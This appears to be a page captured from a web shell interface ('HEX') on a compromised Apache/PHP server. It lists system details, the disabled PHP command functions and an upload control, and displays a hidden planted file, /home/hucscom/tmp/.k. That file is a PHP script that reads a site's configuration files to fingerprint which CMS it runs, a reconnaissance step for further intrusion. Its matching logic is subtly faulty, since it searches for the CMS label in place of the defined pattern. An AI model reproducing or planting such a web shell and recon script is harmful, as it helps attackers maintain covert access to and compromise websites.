HEX
Server: Apache/2
System: Linux aws3 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User: hucscom (1018)
PHP: 8.1.32
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hucscom/tmp/.k
<?php   $r = '/home/hucscom/domains/huc99-s.com/private_html'; $a = ['wp-config.php' => ['DB_PASSWORD' => 'wp'], 'index.php' => ['@package    Joomla.Site' => 'joomla', 'DRUPAL_ROOT' => 'drupal', 'use Magento\Framework\App\Bootstrap' => 'magento'], 'configuration.php' => ['JConfig' => 'joomla'], 'cron.php' => ['DRUPAL_ROOT' => 'drupal', 'Magento\Store\Model' => 'magento'], 'init.php' => ['Copyright since 2007 PrestaShop' => 'prestashop'], 'config.php' => ["define('DIR_APPLICATION'" => 'opencart']];  foreach ($a as $path => $patterns) {     $t = "{$r}/{$path}";     if (file_exists($t)) {         $c = file_get_contents($t);         foreach ($patterns as $p => $cms) {             if(strstr($c, $cms)) {                 die("<c>{$cms}</c>");             }         }     } } die('<c>unknown</c>');